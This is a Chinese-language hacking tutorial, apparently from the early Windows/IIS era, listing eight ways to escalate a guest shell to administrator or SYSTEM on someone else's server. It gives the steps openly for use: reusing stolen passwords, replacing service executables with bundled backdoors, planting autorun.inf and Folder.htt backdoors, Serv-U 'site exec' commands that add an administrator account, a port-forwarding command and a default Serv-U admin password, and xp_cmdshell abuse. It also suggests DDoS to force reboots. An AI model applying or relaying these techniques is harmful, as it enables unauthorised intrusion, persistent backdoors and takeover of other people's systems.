Guest許可權提升方法總結

現在的入侵是越來越難了，人們的安全意識都普遍提高了不少，連個人使用者都懂得防火牆，殺毒軟體要裝備在手，對於微軟的補丁升級也不再是不加問津。因此現在我們想在網際網路上掃描弱口令的主機已經幾乎是癡心妄想了。（這可是一件大大的好事啊。） 但是這也使得我們作駭客的進行入侵檢測達到了一個前所未有的難度。通過各種手段，我們通常並不能直接獲得一個系統的管理員權限。比如我們通過某些對IIS的攻擊，只能獲得IUSR-MACHINENAME的許可權（如上傳asp木馬，以及某些溢出等）。這個帳號通常可是系統預設的guest許可權，於是，如何拿到系統管理員或者是system許可權，便顯得日益重要了。 於是，我就總結了一下大家所經常使用的幾種提升許可權的方法，以下內容是我整理的，沒有什麼新的方法，寫給和我一樣的菜鳥看的。高手們就可以略去了，當然，你要複習我不反對，順便幫我查查有什麼補充與修改： 1、社交工程學。 對於社交工程學，我想大家一定不會陌生吧？（如果你還不太明白這個名詞的話，建議你去找一些相關資料查查看。）我們通常是通過各種辦法獲得目標的敏感資訊，然後加以分析，從而可以推斷出對方admin的密碼。舉一個例子：假如我們是通過對伺服器進行資料庫猜解從而得到admin在網站上的密碼，然後藉此上傳了一個海洋頂端木馬，你會怎麼做？先翻箱倒櫃察看asp檔案的代碼以希望察看到串連SQL的帳號密碼？錯錯錯，我們應該先鍵入一個netstat –an命令察看他開的連接埠（當然用net start命令察看服務也行）。一旦發現他開了3389，猶豫什嗎？馬上拿出你的終端連接器，添上對方IP，鍵入你在他網站上所獲得的使用者名稱及密碼……幾秒之後，呵呵，進去了吧？這是因為根據社交工程學的原理，通常人們為了記憶方便，將自己在多處的使用者名稱與密碼都是用同樣的。於是，我們獲得了他在網站上的管理員密碼，也就等同於獲得了他所有的密碼。其中就包括系統admin密碼。於是我們就可以藉此登入他的3389拉！ 即使他並沒有開啟3389服務，我們也可以憑藉這個密碼到他的FTP伺服器上試試，如果他的FTP伺服器是serv-u 5.004 以下版本，而帳號又具有寫入權限，那麼我們就可以進行溢出攻擊了！這可是可以直接拿到system許可權的哦！（利用serv-u還有兩個提升許可權的方法， 我待會兒會說的） 實在不行，我們也可以拿它的帳號去各大網站試試！或許就能進入他所申請的郵箱拿到不少有用的資訊！可以用來配合我們以後的行動。 還有一種思路，我們知道，一個網站的網管通常會將自己的首頁設為IE開啟後的預設首頁，以便於管理。我們就可以利用這一點，將他自己的首頁植上網頁木馬……然後等他開啟IE……呵呵，他怎麼也不會想到自己的首頁會給自己種上木馬吧？ 其實利用社交工程學有很多種方法，想作為一個合格駭客，這可是必學的哦！多動動你自己的腦子，你才會成功！ 2、本地溢出。 微軟實在是太可愛了，這句話也不知是哪位仁兄說的，真是不假，時不時地就會給我們送來一些溢出漏洞，相信通過最近的MS-0011大家一定又賺了一把肉雞吧？其實我們在拿到了Guest許可權的shell後同樣可以用溢出提升許可權。最常用的就是RunAs.exe、 winwmiex.exe 或是PipeUpAdmin等等。上傳執行後就可以得到Admin許可權。但一定是對方沒有打過補丁的情況下才行，不過最近微軟的漏洞一個接一個，本地提升許可權的exploit也會出來的，所以大家要多多關心漏洞資訊，或許下一個exploit就是你寫出來的哦！ 3、利用scripts目錄的可執行許可權。 這也是我們以前得到webshell後經常使用的一招，原理是Scripts目錄是IIS下的可運行目錄，許可權就是我們夢寐以求的SYSTEM許可權。常見的使用方法就是在U漏洞時代我們先上傳idq.dll到IIS主目錄下的Scripts目錄，然後用ispc.exe進行串連，就可以拿到system許可權，不過這個是在Microsoft出了SP3之後就行不通了，其實我們仍可以利用此目錄，只要我們上傳別的木馬到此目錄，我舉個例子就比如是winshell好了。然後我們在IE中輸入： http://targetIP/Scripts/木馬檔案名稱.exe 等一會，看到下面進度條顯示“完成”時，可以了，串連你設定的連接埠吧！我這裡是預設的5277，串連好後就是SYSTEM許可權了！這時你要幹什麼我就管不著了……嘿嘿 4、替換系統服務。 這可是廣大黑友樂此不疲的一招。因為windows允許對正在運行中的程式進行改動，所以我們就可以替換他的服務以使得系統在重啟後自動運行我們的後門或是木馬！首先，通過你獲得的guest許可權的shell輸入：net start命令，察看他所啟動並執行服務。此時如果你對windows的系統服務熟悉的話，可以很快看出哪些服務我們可以利用。 C:/WINNT/System32/>net start 已經啟動以下 Windows 服務: COM+ Event System Cryptographic Services DHCP Client Distributed Link Tracking Client DNS Client Event Log Help and Support IPSEC Services Logical Disk Manager Logical Disk Manager Administrative Servic Network Connections Network Location Awareness (NLA) Protected Storage Remote Procedure Call (RPC) Rising Process Communication Center Rising Realtime Monitor Service Secondary Logon Security Accounts Manager Shell Hardware Detection System Event Notification System Restore Service Telephony Themes Upload Manager WebClient Windows Audio Windows Image Acquisition (WIA) Windows Management Instrumentation Windows Time Wireless Zero Configuration Workstation 命令成功完成。 我先在我的機器上運行一下命令做個示範（大家別黑我呀），注意我用紅色標註的部分，那是我安裝的瑞星。Rising Process Communication Center服務所調用的是CCenter.exe，而Rising Realtime Monitor Service服務調用的是RavMonD.exe。這些都是第三方服務，可以利用。（強烈推薦替換第三方服務，而不要亂動系統服務，否則會造成系統不穩定）於是我們搜尋這兩個檔案，發現他們在D:/ rising/rav/檔案夾中，此時注意一點：如果此檔案是在系統硬碟的Program Files目錄中時，我們要知道，如果對方是使用的NTFS格式的硬碟，那麼系統硬碟下的這個檔案夾guest許可權是預設不可寫的，還有Windows目錄、Documents and Settings目錄這些都是不可寫的，所以我們就不能替換檔案，只能令謀途徑了。（這也是為什麼我不建議替換系統服務的原因之一，因為系統服務檔案都在Windows/System32目錄中，不可寫）但如果是FAT32格式就不用擔心，由於它的先天不足，所有檔案夾都是可寫的。 於是就有人會問：如果是NTFS格式難道我們就沒轍了嗎？ 當然不是，NTFS格式預設情況下除了對那三個檔案夾有限制外，其餘的檔案夾、分區都是everyone完全控制。（也就是說我即使是IPC$的匿名串連，都會對這些地方有可寫可運行許可權！）所以一旦對方的第三方服務不是安裝在那三個檔案夾中，我們就可以替換了！我就拿CCenter下手，先將它下載到本地機器上（FTP、放到IIS主目錄中再下載等等……）然後拿出你的檔案捆綁機，找到一個你最拿手的後門……呵呵，捆綁好後，上傳，先將對方的CCenter.exe檔案改個名CCENTBAK.exe，然後替換成自己的CCenter。現在只需要等對方的機器重啟，我們的後門就可以運行了！由於Windows系統的不穩定，主機在一個禮拜後就會重啟，（當然如果你等不及的話，可以對此伺服器進行DDOS攻擊迫使他重啟，但我並不贊同！）此時登上你的後門，就是System許可權了！ 5、替換admin常用程式。 如果對方沒有你所能利用的服務，也可以替換對方管理員常用的程式，例如QQ，MSN等等，具體替換方法與替換服務一樣，只是你的後門什麼時候可以啟動就得看你的運氣了。 6、利用autorun .inf或desktop.ini。 我們常會碰到這種事：光碟片放進光碟機，就會自動跳出來一段FLASH，這是為什嗎？呵呵，你到光碟片的根目錄中看看，是否有一個autorun.inf的檔案？用記事本開啟來看看，是不是有這麼一句話：autorun=xxx.exe 這就是你剛才所看到的自動啟動並執行程式了。 於是我們就可以利用這個來提升我們的許可權。先配置好一個後門，（我常用的是winshell，當然你不用這個也行）上傳到他D盤下的任意一個檔案夾中，然後從你那個自啟動並執行光碟片中把autorun.inf檔案也上傳，不過上傳前先將autorun=xxx.exe 後面的xxx.exe改為你配置的後門檔案途徑、檔案名稱，然後再上傳到d盤根目錄下，加上唯讀、系統、隱藏屬性。OK就等對方admin瀏覽D盤，我們的後門就可以啟動了！（當然，這必須是在他沒有禁止自動啟動並執行情況下才行。） 另外有相同作用的是desktop.ini。大家都知道windows支援自訂檔案，其實它就是通過在檔案夾中寫入特定檔案——desktop.ini與Folder.htt來實現的，我們就可以利用修改這檔案來達到我們的目的。 首先，我們現在本地建立一個檔案夾，名字不重要，進入它，在空白處點右鍵，選擇“自訂檔案夾”（xp好像是不行的）一直下點，預設即可。完成後，你就會看到在此目錄下多了兩個名為Folder setting的檔案架與desktop.ini的檔案，（如果你看不到，先取消“隱藏受保護的作業系統檔案”）然後我們在Folder setting目錄下找到Folder.htt檔案，記事本開啟，在任意地方加入以下代碼： <OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的後門檔案名稱”> </OBJECT> 然後你將你的後門檔案放在Folder setting目錄下，把此目錄與desktop.ini一起上傳到對方任意一個目錄下，就可以了，只要等管理員瀏覽了此目錄，它就執行了我們的後門！（如果你不放心，可以多設定幾個目錄） 7、Serv-U提升許可權 利用Serv-U提升許可權共有三種方法，溢出是第一種，我之前已經說過，這裡就不介紹了。我要講的是其餘兩種辦法。 辦法一：要求：對Serv-u安裝目錄有完全控制權。 方法：進入對方的Serv-U目錄，察看他的ServUDaemon.ini，這是Serv-U的設定檔，如果管理員沒有選擇將serv- u的所有配置寫入註冊表的話，我們就可以從這個檔案中看到Serv-U的所有資訊，版本、IP、甚至使用者名稱與密碼！早些版本的密碼是不加密的，但是後來是經過了MD5加密。所以不能直接得到其密碼。不過我們仍然有辦法：先在本地安裝一個Serv-U（版本最好新點），將你自己的ServUDaemon.ini檔案用從他那下載下來的ServUDaemon.ini 覆蓋掉，重起一下Serv-U，於是你上面的所有配置都與他的一模一樣了。我們建立一個使用者，什麼組不重要，重要的是將他的主目錄改為對方的系統硬碟，然後加上執行許可權！這個最重要。更改完後應用，退出。再將你更改過的ServUDaemon.ini 檔案上傳，覆蓋掉他的檔案，然後就等他的Serv-U重啟更新配置，之後我們就可以登入他的FTP。進入後執行以下命令： Cd windows Cd System32 Quote site exec net.exe user wofeiwo /add Quote site exec net.exe localgroup administrators wofeiwo /add Bye 然後你就有了一個叫wofeiwo的系統管理員了，還等什麼?登陸3389，大功告成！ 辦法二：Serv-u開了兩個連接埠，一個是21，也就是ＦＴＰ了，而另一個是43958，這個連接埠是幹什麼的？嘿嘿，這個是Ｓｅｒｖ－Ｕ的本地管理連接埠。但是預設是不準除了１２７．０．０．１外的ｉｐ串連的，此時就要用到FPIPE.exe檔案，這是一個連接埠轉寄程式，上傳他，執行命令： Fpipe –v –l 3333 –r 43958 127.0.0.1 意思是將4444連接埠映射到43958連接埠上。 然後就可以在本地安裝一個Serv-u，建立一個伺服器，IP填對方IP，帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 串連上後你就可以管理他的Serv-u了，之後提升許可權的方法參考辦法一。我就不贅述了。 8、SQL帳戶密碼泄露。 如果對方開了MSSQL伺服器，我們就可以通過用SQL連接器加管理員帳號，因為MSSQL是預設的SYSTEM許可權。 要求：你得到了對方MSSQL管理員密碼（可以從他的串連資料庫的ASP檔案中看到）,對方沒有刪除xp_cmdshell 方法：使用Sqlexec.exe，在host 一欄中填入對方IP，User與Pass中填入你所得到的使用者名稱與密碼。Format選擇xp_cmdshell”%s”即可。然後點擊connect，串連上後就可以在CMD一欄中輸入你想要的CMD命令了。 唔……升個懶腰，好累阿，終於寫完8個方法了，發發牢騷……（以下省略N字元） 總之，以上的8種方法並不是絕對的，最主要的是你的思路，每種方法互相結合，才能發揮其應有的效應